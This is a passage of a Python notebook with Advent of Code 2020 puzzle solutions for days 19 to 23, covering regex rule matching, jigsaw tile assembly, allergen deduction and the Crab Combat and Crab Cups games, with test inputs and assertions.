# The most simple/elegant would be to create a grammar for this problem and parse the rules (lexx/yacc) etc.
# But as a shortcut today I did a fallback on only using/constructing text regular expressions.
# In[ ]:
def parse_day19_rules(s):
rules = s.split("\n")
rules = mapl(lambda it: it.split(': '), rules)
return rules
def parse_day19(s):
rules, samples = s.strip().split("\n\n")
rules = parse_day19_rules(rules)
samples = samples.split("\n")
log.debug(f"parsed:\n rules=\n{rules}\n samples=\n{samples}")
return rules, samples
def solve_day19(rules, max_depth=30, part=1):
log.debug(f"[solve19b] started")
pd = {}
rules_keys = []
for rule in rules:
rule_num, rule_expr = rule
rules_keys.append(rule_num)
if rule_expr.startswith('"') and rule_expr.endswith(''):
log.debug(f" added key={rule_num} rule={rule_expr}")
pd[rule_num] = rule_expr.replace('"', '')
missing_rules_keys = rules_keys.copy()
for k in pd.keys():
missing_rules_keys.remove(k)
for i in range(1, max_depth+2):
log.debug(f" loop#={i}")
found_new_key = False
for rule in rules:
rule_num, rule_expr = rule
if part == 2: # apply part 2 conditions:
if rule_num == '8':
rule_expr = '42 | 42 8'
elif rule_num == '11':
rule_expr = '42 31 | 42 11 31'
if not rule_num in pd.keys():
ree = rule_expr.split(' ')
rules_contained = set(filterl(lambda it: it != '|', ree))
log.trace(f"unparsed rule {rule}, rules_contained={rules_contained}")
if set(rules_contained).issubset(pd.keys()):
log.trace(f"can add {ree}")
r = str.join('', mapl(lambda it: pd[it] if it in pd.keys() else it, ree))
pd[rule_num] = '(' + r + ')'
found_new_key = True
missing_rules_keys.remove(rule_num)
log.debug(f" added key={rule_num} rule={r}")
else:
log.trace(f"can't add {ree}")
if not found_new_key:
if not '0' in pd.keys():
log.debug(f"rule0 not found after {i} loops, rules-found={sorted(pd.keys())}")
log.debug(f" rules_missing={sorted(missing_rules_keys)}")
if part == 2:
log.debug(f" rules[42]={pd['42']}")
log.debug(f" rules[31]={pd['31']}")
# THIS is the re secret sauce expressing ca. conditions:
# > rule_expr = '42 | 42 8' :: 1..n of pattern 42
pd['8'] = f"({pd['42']})+"
# > rule_expr = '42 31 | 42 11 31' :: 1..n of pattern 42 followd by 31
#pd['11'] = f"({pd['42']})+({pd['31']})+" # the first and second + repeat count have to be same
ors = []
for i in range(1, 6):
pl = pd['42']
pr = pd['31']
ors.append(pl*i+pr*i)
pd['11'] = f"({str.join('|', ors)})"
# > 8 11
pd['0'] = f"{pd['8']}{pd['11']}"
log.debug(f" rules[8]={pd['8']}")
log.debug(f" len(rules[11])={len(pd['11'])}")
log.debug(f" len(rules[0])={len(pd['0'])}")
break
log.debug(f"[solve19b] parsed-dict={pd}")
return pd
# In[ ]:
tests = """
0: 1 2
1: "a"
2: 1 3 | 3 1
3: "b"
""".strip()
# In[ ]:
log.setLevel(logging.INFO)
rules = parse_day19_rules(tests)
log.info(f"test: parsed rules\n{rules}")
pd = solve_day19(rules)
rule0 = pd['0']
assert( re.match(rule0, "aab") )
assert( re.match(rule0, "aba") )
assert( not re.match(rule0, "bba") )
# In[ ]:
tests = """
0: 4 1 5
1: 2 3 | 3 2
2: 4 4 | 5 5
3: 4 5 | 5 4
4: "a"
5: "b"
""".strip()
rules = parse_day19_rules(tests)
log.info(f"test: parsed rules\n{rules}")
pd = solve_day19(rules)
log.info(f"tests parse-dir={pd}")
rule0='^' + pd['0'] + '$'
samples = "aaaabb,aaabab,abbabb,abbbab,aabaab,aabbbb,abaaab,ababbb".split(',')
for sample in samples:
assert( re.match(rule0, sample) )
assert( not re.match(rule0, "baaabb") )
assert( not re.match(rule0, "ababba") )
# In[ ]:
tests = """
0: 4 1 5
1: 2 3 | 3 2
2: 4 4 | 5 5
3: 4 5 | 5 4
4: "a"
5: "b"
ababbb
bababa
abbbab
aaabbb
aaaabbb
""".strip()
# In[ ]:
#ababbb and abbbab match
#bababa, aaabbb, and aaaabbb
rules, samples = parse_day19(tests)
pd = solve_day19(rules)
log.info(f"rule0={pd['0']}")
rule0='^' + pd['0'] + '$'
smatching = 0
for sample in samples:
if re.match(rule0, sample):
#log.info(f"{sample} matches {rule0}")
smatching +=1
else:
#log.info(f"{sample} NOmatch {rule0}")
True
log.info(f"matching-samples-#={smatching}")
assert ( smatching == 2)
# In[ ]:
ins = aoc.read_file_to_str('./in/day19.in')
rules, samples = parse_day19(ins)
pd = solve_day19(rules)
log.debug(f"rule0={pd['0']}")
rule0='^' + pd['0'] + '$'
log.info(f"parsed-rules, len(rule0)={len(rule0)}")
smatching = 0
for sample in samples:
if re.match(rule0, sample):
smatching +=1
#log.info(f"{sample} matches {rule0}")
#else:
# log.info(f"{sample} NOmatch {rule0}")
log.info(f"matching-samples-#={smatching}")
# In[ ]:
print("Day 19 b")
tests = """
42: 9 14 | 10 1
9: 14 27 | 1 26
10: 23 14 | 28 1
1: "a"
11: 42 31
5: 1 14 | 15 1
19: 14 1 | 14 14
12: 24 14 | 19 1
16: 15 1 | 14 14
31: 14 17 | 1 13
6: 14 14 | 1 14
2: 1 24 | 14 4
0: 8 11
13: 14 3 | 1 12
15: 1 | 14
17: 14 2 | 1 7
23: 25 1 | 22 14
28: 16 1
4: 1 1
20: 14 14 | 1 15
3: 5 14 | 16 1
27: 1 6 | 14 18
14: "b"
21: 14 1 | 1 14
25: 1 1 | 1 14
22: 14 14
8: 42
26: 14 22 | 1 20
18: 15 15
7: 14 5 | 1 21
24: 14 1
abbbbbabbbaaaababbaabbbbabababbbabbbbbbabaaaa
bbabbbbaabaabba
babbbbaabbbbbabbbbbbaabaaabaaa
aaabbbbbbaaaabaababaabababbabaaabbababababaaa
bbbbbbbaaaabbbbaaabbabaaa
bbbababbbbaaaaaaaabbababaaababaabab
ababaaaaaabaaab
ababaaaaabbbaba
baabbaaaabbaaaababbaababb
abbbbabbbbaaaababbbbbbaaaababb
aaaaabbaabaaaaababaa
aaaabbaaaabbaaa
aaaabbaabbaaaaaaabbbabbbaaabbaabaaa
babaaabbbaaabaababbaabababaaab
aabbbbbaabbbaaaaaabbbbbababaaaaabbaaabba
""".strip()
log.setLevel(logging.INFO)
rules, samples = parse_day19(tests)
max_samples_len = max(mapl(len, samples))
log.debug(f"max_samples_len={max_samples_len}")
pd = solve_day19(rules, part=2, max_depth=max_samples_len)
log.debug(f"rule0={pd['0']}")
rule0='^' + pd['0'] + '$'
log.info(f"parsed-rules, len(rule0)={len(rule0)}")
smatching = 0
for sample in samples:
if re.match(rule0, sample):
smatching +=1
log.info(f"matching-samples-#={smatching}")
assert( 12 == smatching )
# In[ ]:
log.setLevel(logging.INFO)
rules, samples = parse_day19(ins)
max_samples_len = max(mapl(len, samples))
log.debug(f"max_samples_len={max_samples_len}")
pd = solve_day19(rules, part=2, max_depth=max_samples_len)
log.debug(f"rule0={pd['0']}")
rule0='^' + pd['0'] + '$'
log.info(f"parsed-rules, len(rule0)={len(rule0)}")
smatching = 0
for sample in samples:
if re.match(rule0, sample):
smatching +=1
log.info(f"matching-samples-#={smatching}")
# ### Day 20: Jurassic Jigsaw
# In[ ]:
tests = """
Tile 2311:
..##.#..#.
##..#.....
#...##..#.
####.#...#
##.##.###.
##...#.###
.#.#.#..##
..#....#..
###...#.#.
..###..###
Tile 1951:
#.##...##.
#.####...#
.....#..##
#...######
.##.#....#
.###.#####
###.##.##.
.###....#.
..#.#..#.#
#...##.#..
Tile 1171:
####...##.
#..##.#..#
##.#..#.#.
.###.####.
..###.####
.##....##.
.#...####.
#.##.####.
####..#...
.....##...
Tile 1427:
###.##.#..
.#..#.##..
.#.##.#..#
#.#.#.##.#
....#...##
...##..##.
...#.#####
.#.####.#.
..#..###.#
..##.#..#.
Tile 1489:
##.#.#....
..##...#..
.##..##...
..#...#...
#####...#.
#..#.#.#.#
...#.#.#..
##.#...##.
..##.##.##
###.##.#..
Tile 2473:
#....####.
#..#.##...
#.##..#...
######.#.#
.#...#.#.#
.#########
.###.#..#.
########.#
##...##.#.
..###.#.#.
Tile 2971:
..#.#....#
#...###...
#.#.###...
##.##..#..
.#####..##
.#..####.#
#..#.#..#.
..####.###
..#.#.###.
...#.#.#.#
Tile 2729:
...#.#.#.#
####.#....
..#.#.....
....#..#.#
.##..##.#.
.#.####...
####.#.#..
##.####...
##..#.##..
#.##...##.
Tile 3079:
#.#.#####.
.#..######
..#.......
######....
####.#..#.
.#...#.##.
#.#####.##
..#.###...
..#.......
..#.###...
""".strip()
# In[ ]:
def get_dimens(num_tiles):
for gridx in range(1, num_tiles+1):
for gridy in range(1, num_tiles+1):
if gridx * gridy == num_tiles:
if gridx > 1 and gridy > 1:
log.info(f"[get_dimens] {gridx}x{gridy} dimen possible.")
def get_borders(tile):
borders = set()
rows = tile.split("\n")
borders.add(rows[0])
borders.add(rows[0][::-1]) # reversed
borders.add(rows[-1])
borders.add(rows[-1][::-1]) # reversed
col0 = str.join('', mapl(lambda it: it[0], rows))
col_last = str.join('', mapl(lambda it: it[-1], rows) )
borders.add(col0)
borders.add(col0[::-1]) # reversed
borders.add(col_last)
borders.add(col_last[::-1]) # reversed
return borders
def find_corner_tiles(tiles):
tile_keys = tiles.keys()
borders = {}
bsects = {}
for key in tile_keys:
borders[key] = get_borders(tiles[key])
bsects[key] = []
for combi in itertools.permutations(tile_keys, 2):
key1, key2 = combi
b1 = borders[key1]
b2 = borders[key2]
bsects[key1].append( len( b1 & b2 ) )
corner_tiles = set()
for key in tile_keys:
#log.info(f"key: {key} {bsects[key]}")
bct = len( filterl(lambda it: it > 0, bsects[key]) )
if bct < 3:
#log.info(f"border-tile: {key}")
corner_tiles.add(key)
#elif bct == 4:
# log.info(f"middle-tile: {key}")
return corner_tiles
def find_border_tiles(tiles):
tile_keys = tiles.keys()
borders = {}
bsects = {}
for key in tile_keys:
borders[key] = get_borders(tiles[key])
bsects[key] = []
for combi in itertools.permutations(tile_keys, 2):
key1, key2 = combi
b1 = borders[key1]
b2 = borders[key2]
bsects[key1].append( len( b1 & b2 ) )
border_tiles = set()
for key in tile_keys:
bct = len( filterl(lambda it: it > 0, bsects[key]) )
if bct == 3:
border_tiles.add(key)
return border_tiles
def parse_tiles(s):
d = {}
for tile_str in s.split("\n\n"):
tile_repr = ''
for idx, line in enumerate(tile_str.split("\n")):
if idx == 0:
tile_id = int( line.replace('Tile ','').replace(':','') )
else:
tile_repr += line + "\n"
d[tile_id] = tile_repr.strip()
return d
# In[ ]:
tiles = parse_tiles(tests)
num_tiles = len(tiles.keys())
tile_keys = tiles.keys()
log.info(f"tests num-tiles={num_tiles}")
get_dimens(num_tiles)
find_corner_tiles(tiles)
# In[ ]:
ins = aoc.read_file_to_str('in/day20.in').strip()
tiles = parse_tiles(ins)
num_tiles = len(tiles.keys())
log.info(f"input num-tiles={num_tiles}")
res = find_corner_tiles(tiles)
log.info(f"ins corner-tiles={res}")
res = np.prod(list(res))
log.info(f"Day 20 a solution: border-tiles-product={res}")
# In[ ]:
print("Day 20 b")
# In[ ]:
from math import sqrt
def flip_vert_tile(s):
"""Flip a tile vertically, return str repr."""
return str.join("\n", list(reversed(s.split("\n"))))
def flip_horiz_tile(s):
"""Flip a tile horizontally, return str repr."""
new_los = []
for line in s.split("\n"):
new_los.append(str.join('', reversed(line)))
return str.join("\n", new_los)
def rotate_tile(s):
"""Left-rotate of tile representation, return str repr."""
lol = mapl(lambda it: list(it), s.split("\n"))
new_los = []
for islice in reversed(range(len(lol))):
line = str.join('', mapl(lambda it: it[islice], lol))
new_los.append(line)
log.trace("rot-repr=\n"+str.join("\n", new_los))
return str.join("\n", new_los)
def get_tile_transforms(s):
"""Provide all transforms of a tile as list, including identity."""
transforms = [s] # start with identity as first elem
current_repr = s
for rot_num in range(3):
current_repr = rotate_tile(current_repr)
transforms.append(current_repr)
current_repr = flip_vert_tile(s)
transforms.append(current_repr)
for rot_num in range(3):
current_repr = rotate_tile(current_repr)
transforms.append(current_repr)
current_repr = flip_horiz_tile(s)
transforms.append(current_repr)
for rot_num in range(3):
current_repr = rotate_tile(current_repr)
transforms.append(current_repr)
return set(transforms)
def fits_horiz(lefts, rights):
lhs = str.join('', mapl(lambda it: it[-1], lefts.split("\n")))
rhs = str.join('', mapl(lambda it: it[0], rights.split("\n")))
return lhs == rhs
def fits_vert(tops, bottoms):
lhs = tops.split("\n")[-1]
rhs = bottoms.split("\n")[0]
return lhs == rhs
def get_next_coord(coord, image_width):
x, y = coord
nx = (x+1) % image_width
if x == image_width-1:
ny = y+1
else:
ny = y
log.trace(f"next-coord={(nx, ny)}")
return (nx, ny)
def is_corner(coord, image_width):
b = (coord[0] in [0, image_width-1]) and (coord[1] in [0, image_width-1])
if b:
log.trace(f"{coord} is corner; image_width={image_width}")
return b
def is_border(coord, image_width):
log.trace(f"{coord} is border image_width={image_width}")
b = not is_corner(coord, image_width) and ((coord[0] in [0, image_width-1]) or (coord[1] in [0, image_width-1]))
if b:
log.info(f"{coord} is border; image_width={image_width}")
return b
def create_image(tiles, tilekeys_left, img, imgidx, coord, corner_tiles, border_tiles, image_width):
x, y = coord
log.debug(f"[create_image] tks-left={len(tilekeys_left)}, @{coord}")
if x >= image_width or y >= image_width:
log.debug(f"FOUND\n{np.array(imgidx)}")
return True, img, imgidx
if y > 0 and x > 0:
#log.info(f" check h+v")
#if is_corner(coord, image_width): # @ corner
# tkl2 = tilekeys_left & corner_tiles
#elif is_border(coord, image_width): # @border
# tkl2 = tilekeys_left & border_tiles
#else:
# tkl2 = tilekeys_left
#for tk in tkl2:
for tk in tilekeys_left:
for tvari in get_tile_transforms( tiles[tk] ):
if fits_horiz(img[y][x-1], tvari) and fits_vert(img[y-1][x], tvari):
tkl_new = tilekeys_left.copy(); tkl_new.remove(tk)
img_new = copy.deepcopy(img); img_new[y][x] = tvari
log.debug(f"found h+v match for tilekey={tk} @{coord}")
imgidx_new = copy.deepcopy(imgidx); imgidx_new[y][x] = tk
return create_image(tiles, tkl_new, img_new, imgidx_new, get_next_coord(coord, image_width), corner_tiles, border_tiles, image_width)
elif y > 0:
#log.info(f" check v")
#if is_corner(coord, image_width): # @ corner
# tkl2 = tilekeys_left & corner_tiles
#else: # @border
# tkl2 = tilekeys_left & border_tiles
#for tk in tkl2:
for tk in tilekeys_left:
for tvari in get_tile_transforms( tiles[tk] ):
if fits_vert(img[y-1][x], tvari):
tkl_new = tilekeys_left.copy(); tkl_new.remove(tk)
img_new = copy.deepcopy(img); img_new[y][x] = tvari
imgidx_new = copy.deepcopy(imgidx); imgidx_new[y][x] = tk
log.debug(f"found h+v match for tilekey={tk} @{coord}")
return create_image(tiles, tkl_new, img_new, imgidx_new, get_next_coord(coord, image_width), corner_tiles, border_tiles, image_width)
elif x > 0:
#log.info(f" check h")
#if is_corner(coord, image_width): # @ corner
# tkl2 = tilekeys_left & corner_tiles
#else: # @border
# tkl2 = tilekeys_left & border_tiles
#for tk in tkl2:
for tk in tilekeys_left:
for tvari in get_tile_transforms( tiles[tk] ):
if fits_horiz(img[y][x-1], tvari):
tkl_new = tilekeys_left.copy(); tkl_new.remove(tk)
img_new = copy.deepcopy(img); img_new[y][x] = tvari
imgidx_new = copy.deepcopy(imgidx); imgidx_new[y][x] = tk
log.debug(f"found h+v match for tilekey={tk} @{coord}")
return create_image(tiles, tkl_new, img_new, imgidx_new, get_next_coord(coord, image_width), corner_tiles, border_tiles, image_width)
log.trace("[create_image] fall-out")
return False, img, imgidx
def assemble_image(tiles):
tiles_keys = tiles.keys()
num_tiles = len(tiles)
image_width = int(sqrt(num_tiles))
corner_tiles = find_corner_tiles(tiles)
log.info(f"[assemble_image] corner-tiles-#={len(corner_tiles)}")
assert( 4 == len(corner_tiles) )
border_tiles = find_border_tiles(tiles)
log.info(f"[assemble_image] border-tiles-#={len(border_tiles)}; image_width={image_width}")
assert( 4*(image_width-2) == len(border_tiles) )
start_tile = list(corner_tiles)[0]
log.info(f"[assemble_image] starting; tiles_set={set(tiles_keys)}")
tilekeys_left = set(tiles_keys) - set([start_tile])
for vari in get_tile_transforms( tiles[start_tile] ):
img = [[None for x in range(image_width)] for y in range(image_width)]
imgidx = [[None for x in range(image_width)] for y in range(image_width)]
img[0][0] = vari
imgidx[0][0] = start_tile
log.debug(f"first corner tile img=\n{vari}")
img_found, img_final, imgidx_final = create_image(tiles, tilekeys_left, img, imgidx, get_next_coord((0,0), image_width), corner_tiles, border_tiles, image_width)
if img_found:
log.info(f"IMG found, idxs=\n{imgidx_final}")
break
assert( img_found )
return img_found, img_final, imgidx_final
def get_image_repr(img):
img_len = len(img)
tile_len = len(img[0][0].split("\n"))
log.debug(f"[get_image_repr] num-tiles={img_len}^2={img_len**2} cells-per-tile={tile_len**2}")
images = copy.deepcopy(img)
for img_y in range(img_len):
for img_x in range(img_len):
images[img_y][img_x] = img[img_y][img_x].split("\n") # split each tile line-wise
img_rows = []
for img_rowidx in range(img_len):
tiles_rows = []
for tile_rowidx in range(tile_len):
tiles_row = ""
for img_colidx in range(img_len):
tiles_row += images[img_rowidx][img_colidx][tile_rowidx]
tiles_rows.append(tiles_row)
img_rows.append(str.join("\n", tiles_rows))
img_repr = str.join("\n", img_rows)
return img_repr
def show_image(img):
img_len = len(img)
tile_len = len(img[0][0].split("\n"))
log.info(f"[show_image] num-tiles={img_len}^2={img_len**2} cells-per-tile={tile_len**2}")
log.info("\n"+get_image_repr(img))
def cut_tile_borders(tile):
los = tile.split("\n")
tile_len = len(los)
new_los = []
for idx, line in enumerate(los):
if idx in [0, tile_len-1]:
continue
new_line = line[1:-1]
assert(len(new_line) == tile_len-2)
new_los.append( new_line )
assert(len(new_los) == tile_len-2)
return str.join("\n", new_los)
def cut_image_borders(img):
img_len = len(img)
for y in range(img_len):
for x in range(img_len):
tile = img[y][x]
tile = cut_tile_borders(tile)
img[y][x] = tile
return img
# In[ ]:
sea_monster = """
#
# ## ## ###
# # # # # #
"""
def tiles_to_sea_npar(sea_los):
"""Convert original tiles representation to a 'sea' numpy-array of 0s and 1s."""
tiles = parse_tiles(sea_los)
img_found, img, imgidx = assemble_image(tiles)
#show_image(test_img)
img_cut = cut_image_borders(img)
#show_image(test_img_cut)
img_cut = get_image_repr(img_cut) # from x*x matrix to 1 str
image_los = img_cut.replace(".", "0 ").replace("#", "1 ").split("\n")
image_ar = np.array([[int(c) for c in seamst_line.strip().split(" ")] for seamst_line in image_los])
return image_ar
# Thanks github user JesperDramsch:
def variations_of(npar):
"""Return identity and all rotation and flip-horiz flip-vert variations of np-array."""
varias = []
for i in range(4):
tfar = np.rot90(npar, i)
varias.append(tfar)
varias.append(np.flip(tfar, 0))
varias.append(np.flip(tfar, 1))
return varias
# Inspired
# Thanks github user JesperDramsch, via reddit aoc 2020 day 20 solutions/discussion:
# https://github.com/JesperDramsch/advent-of-code-1
def eliminate_monsters(sea, seamst):
"""Given 'sea' and 'seamonster' input numpy-arrays,
eliminate all variations of seamonster (rots, flips) from the sea,
return sea without monsters (np-array)."""
seamst_cct = seamst.sum()
seamst_varias = variations_of(seamst)
monsters_num = 0
while monsters_num == 0:
monster = seamst_varias.pop()
mst_y, mst_x = monster.shape
for y, x in np.ndindex(sea.shape):
sub_arr = sea[y : y + mst_y, x : x + mst_x].copy()
if not sub_arr.shape == monster.shape:
continue
sub_arr *= monster # <= sea & monster
if np.sum(sub_arr) == seamst_cct:
monsters_num += 1
sea[y : y + mst_y, x : x + mst_x] -= monster # => sea - monster
return sea
sea_monster = sea_monster.strip("\n")
#print(f">{sea_monster}<")
# Thanks github user JesperDramsch:
sea_monster_los = sea_monster.replace(" ", "0 ").replace("#", "1 ").split("\n")
#log.info(f"\n{sea_monster_los}")
seamst = np.array([[int(c) for c in seamst_line.strip().split(" ")] for seamst_line in sea_monster_los])
seamst_cct = seamst.sum()
log.info(f"Seamonster cell-count={seamst_cct}")
log.info(f"\n{seamst}")
sea_ar = tiles_to_sea_npar(tests)
log.info(f"sea-nparray, shape={sea_ar.shape}::\n{sea_ar}")
res = eliminate_monsters(sea_ar, seamst).sum()
log.info(f"Day 21 b tests: rough-sea-count={res}")
assert( 273 == res )
# In[ ]:
sea_ar = tiles_to_sea_npar(ins)
log.info(f"sea-nparray, shape={sea_ar.shape}::\n{sea_ar}")
res = eliminate_monsters(sea_ar, seamst).sum()
log.info(f"Day 21 b final solution: rough-sea-count={res}")
# ### Day 21: Allergen Assessment
# In[ ]:
tests = """
mxmxvkd kfcds sqjhc nhms (contains dairy, fish)
trh fvjkl sbzzf mxmxvkd (contains dairy)
sqjhc fvjkl (contains soy)
sqjhc mxmxvkd sbzzf (contains fish)
""".strip().split("\n")
# In[ ]:
def solve_day21(los, part=1):
ingreds_all = set()
log.info(f"[solve21a] num-lines={len(los)}")
allerg_assoc = {}
recips = []
for line in los:
ingreds, allergs = line.split(' (contains ')
ingreds = set(ingreds.strip().split(' '))
allergs = allergs.strip().replace(')','').split(', ')
log.debug(f" ingreds={ingreds}; allergs={allergs}")
ingreds_all |= ingreds
recips.append({'ingreds':ingreds, 'allergs':allergs})
for allerg in allergs:
if not allerg in allerg_assoc:
allerg_assoc[allerg] = set(ingreds)
else:
allerg_assoc[allerg] &= set(ingreds)
for i in range(len(allerg_assoc.keys())): # loop and weed max n times
found_allergs = filterl(lambda it: len(allerg_assoc[it]) == 1, allerg_assoc.keys())
found_ingreds = mapl(lambda it: list(allerg_assoc[it])[0], found_allergs)
for allerg in allerg_assoc.keys():
if allerg in found_allergs:
continue
allerg_assoc[allerg] -= set(found_ingreds)
if 1 == max( mapl(lambda it: len(allerg_assoc[it]), allerg_assoc.keys()) ):
break
allerg_assoc = {k:list(v)[0] for k,v in allerg_assoc.items()} # get rid of wrapping set per values
log.info(f"allerg_assoc={allerg_assoc}")
ingreds_pure = ingreds_all.copy()
for ingred_allergic in allerg_assoc.values():
ingred_allergic = ingred_allergic
ingreds_pure.remove(ingred_allergic)
log.info(f"ingreds-pure={ingreds_pure}")
ct = 0
for ingred_pure in ingreds_pure:
for recip in recips:
if ingred_pure in recip['ingreds']:
ct += 1
log.info(f"day 21 part 1: count of pure ingredients occurences={ct}")
if part == 1:
return ct
vals_ordered = []
for k in sorted(allerg_assoc.keys()):
vals_ordered.append(allerg_assoc[k])
vals_str = str.join(',', vals_ordered)
log.info(f"vals_str=>{vals_str}<")
return vals_str
# In[ ]:
#log.setLevel(aoc.LOGLEVEL_TRACE)
log.setLevel(logging.INFO)
res = solve_day21(tests, part=1)
assert( 5 == res )
# In[ ]:
ins = aoc.read_file_to_list('./in/day21.in')
res = solve_day21(ins, part=1)
logging.info(f"Day 21 a solution: {res}")
# In[ ]:
print("Day 21 b")
#log.setLevel(aoc.LOGLEVEL_TRACE)
#log.setLevel(logging.INFO)
res = solve_day21(tests, part=2)
assert( "mxmxvkd,sqjhc,fvjkl" == res )
# In[ ]:
res = solve_day21(ins, part=2)
log.info(f"Day 21 b solution:\n>{res}<")
# ### Day 22: Crab Combat
# In[ ]:
def parse_day22(s):
players = {}
players_str = s.split("\n\n")
for player_str in players_str:
for line in player_str.split("\n"):
if line.startswith('Player'):
player_id = int(line.replace('Player ', '').replace(':',''))
players[player_id] = []
else:
players[player_id].append(int(line))
log.debug(f"[parse_day22] {players}")
return players
def play_crabcardgame(players):
t = 0
player_keys = list(players.keys())
while(
min( mapl(lambda it: len(players[it]), player_keys) ) > 0
):
draw = mapl(lambda it: players[it].pop(0), player_keys)
winner_idx = draw.index(max(draw))
#players[player_keys[winner_idx]] += sorted(draw, reverse=True)
loser_idx = (0 if winner_idx == 1 else 1)
players[player_keys[winner_idx]] += [draw[winner_idx], draw[loser_idx]] # winner's card first
t += 1
log.debug(f"[play_ccg] t={t} draw={draw} {players}")
if t > 1_000:
raise Exception("failsafe")
players['t'] = t
players['winner'] = player_keys[winner_idx]
return players
def score_crabcardgame(players):
cardstack = players[players['winner']]
log.debug(f"[score_crabcardgame] cardstack={cardstack}")
cardstack = list(reversed(cardstack))
score = 0
for idx in range(len(cardstack)):
score += (idx+1) * cardstack[idx]
return score
# In[ ]:
tests = """
Player 1:
9
2
6
3
1
Player 2:
5
8
4
7
10
""".strip()
# In[ ]:
players = parse_day22(tests)
players = play_crabcardgame(players)
res = score_crabcardgame(players)
assert( 306 == res)
# In[ ]:
ins = aoc.read_file_to_str('in/day22.in').strip()
players = parse_day22(ins)
players = play_crabcardgame(players)
res = score_crabcardgame(players)
log.info(f"Day 22 part 1 solution: winning score={res}")
# In[ ]:
print("Day 22 b")
def hashrep_of(player):
repres = str(player)
return hashlib.sha1(repres.encode()).hexdigest()
def play_recursivecombat(players):#
t = 0
player_keys = list(players.keys())
player_seen_handhashes = set()
plcardnums = [len(players[1]), len(players[2])]
log.debug(f"[play_recursivecombat] plcard#={plcardnums} t={t} {players}")
for t in range(1, 100_000):
log.debug(f"t={t} init={players}")
# NOTE: The hands-already-seen condition had to be read VERY CAREFULLY !!!
player1_hashrep = hashrep_of(players[1])
player2_hashrep = hashrep_of(players[2])
if player1_hashrep in player_seen_handhashes and player2_hashrep in player_seen_handhashes:
### NOTE THE **AND** in above condition !!!
log.debug(f" current hands already seen")
hand_seen = True
else:
player_seen_handhashes.add(player1_hashrep)
player_seen_handhashes.add(player2_hashrep)
hand_seen = False
if hand_seen:
players['t'] = t
players['winner'] = player_keys[0]
players['win-cond'] = 'hand_already_seen'
log.debug(f"win-cond plcard#={plcardnums} already-played players={players}")
return players
draw = mapl(lambda it: players[it].pop(0), player_keys)
log.debug(f" t={t} draw={draw} keeping {players}")
if draw[0] <= len(players[1]) and draw[1] <= len(players[2]):
# both players have enough cards left
log.debug(f" recursing")
recursed_players = copy.deepcopy(players)
# the quantity of cards copied is equal to the number on the card they drew to trigger the sub-game
if draw[0] < len(players[1]):
recursed_players[1] = recursed_players[1][:draw[0]] # cut the stack to size for recursion
if draw[1] < len(players[2]):
recursed_players[2] = recursed_players[2][:draw[1]] # cut the stack to size for recursion
recursed_players = play_recursivecombat(recursed_players)
winner = recursed_players['winner']
else:
winner = draw.index(max(draw)) + 1
winner_idx = winner - 1
loser_idx = (0 if winner_idx == 1 else 1)
players[winner] += [draw[winner_idx], draw[loser_idx]] # winner's card first
if min( mapl(lambda it: len(players[it]), player_keys) ) <= 0:
players['t'] = t
players['winner'] = winner
players['win-cond'] = '1player_out_of_cards'
log.debug(f"win-cond plcard#={plcardnums} 1-player-run-outof-cards players={players}")
return players
raise Exception("failsafe")
# In[ ]:
players = play_recursivecombat(parse_day22(tests))
res = score_crabcardgame(players)
assert( 291 == res )
# In[ ]:
tests_loop = """
Player 1:
43
19
Player 2:
2
29
14
""".strip()
res = play_recursivecombat(parse_day22(tests_loop))
assert( res['win-cond'] == 'hand_already_seen' )
# In[ ]:
#log.setLevel(logging.INFO)
players = play_recursivecombat(parse_day22(ins))
log.info(f"recursive-combat result for ins: {players}")
res = score_crabcardgame(players)
log.info(f"Day 22 part 2 solution: recursive-combat winner-score={res}")
# ### Day 23: Crab Cups
# In[ ]:
def play_crabcups_round(l):
#orig_lst = l.copy()
list_len = len(l)
current = l[0]
taken = [l.pop(1), l.pop(1), l.pop(1)] # take 3
next_val = current - 1
while(True):
if next_val in l:
next_idx = l.index(next_val)
break
else:
next_val -= 1
if next_val <= 0:
next_val = max(l)
log.debug(f"[play_crabcups_round] head={current}, taken={taken}, dest={next_val}")
new_list = [next_val]
new_list = new_list + taken
appending = False
for val in itertools.cycle(l):
if not appending:
if val == next_val:
appending = True
else:
new_list.append(val)
if len(new_list) >= list_len:
break
log.debug(f" new_list={new_list}")
tgt_idx = (new_list.index(current)+1) % list_len
new_list2 = new_list[tgt_idx:] + new_list[:tgt_idx]
log.debug(f" new_list2={new_list2}")
return new_list2
def play_crabcups_game(l, rounds=1):
log.info(f"[play_crabcups_game] started: l={l}, rounds={rounds}")
lst = l.copy()
for i in range(1, rounds+1):
lst = play_crabcups_round(lst)
log.debug(f" round={i} l={lst}")
return lst
def score_crabcups_game(l):
tgt_idx = (l.index(1)+1) % len(l)
if tgt_idx == 0:
outlst = l[tgt_idx, len(l)-1]
else:
outlst = l[tgt_idx:] + l[:tgt_idx-1]
return int( str.join('', mapl(str,outlst)) )
# In[ ]:
tests = "389125467"
test_lst = mapl(int, list(tests))
res = play_crabcups_game(test_lst, rounds=10)
log.info(f"test result={res}")
score = score_crabcups_game(res)
log.info(f"test result 10rds score={score}")
assert( 92658374 == score )
res = play_crabcups_game(test_lst, rounds=100)
score = score_crabcups_game(res)
log.info(f"test result 100rds score={score}")
assert( 67384529 == score)
# In[ ]:
ins = aoc.read_file_to_str('in/day23.in').strip()
ins_lst = mapl(int, list(ins))
res = play_crabcups_game(ins_lst, rounds=100)
log.info(f"Day 23 part 1 result={res}")
score = score_crabcups_game(res)
log.info(f"Day 23 part 1 solution: result 100rds score={score}")
# In[ ]:
print("Day 23 b")
def assemble_crabcups2_list(l, num_cups = 1_000_000):
"""Get a cups-list according to part 2 requirements (1mio cups)."""
out_lst = l.copy()
max_val = max(l)
num_new_cups = num_cups - len(out_lst)
out_lst += list(range(max_val+1, num_cups+1))
assert( num_cups == len(out_lst) )
return out_lst
def play_crabcups_round_opt(l, rounds=1):
"""Optimize play of crabcups for n rounds, using cycling LinkedList instead of list."""
start_tm = int(time.time())
list_len = len(l)
lkl = {}
#firstval = l[0]
#lastval = l[-1]
curval = l[0]
for idx, val in enumerate(l):
next_idx = idx+1
if next_idx == list_len:
next_idx = 0
lkl[val] = l[next_idx]
for rd in range(rounds):
# The crab picks up the three cups that are immediately clockwise of the current cup.
# They are removed from the circle;
# cup spacing is adjusted as necessary to maintain the circle.
n1 = lkl[curval]
n2 = lkl[n1]
n3 = lkl[n2]
lkl[curval] = lkl[n3]
#log.trace(f" re-chained from current={curval} to={lkl[n3]}, taken={[n1, n2, n3]}")
# The crab selects a destination cup:
# the cup with a label equal to the current cup's label minus one.
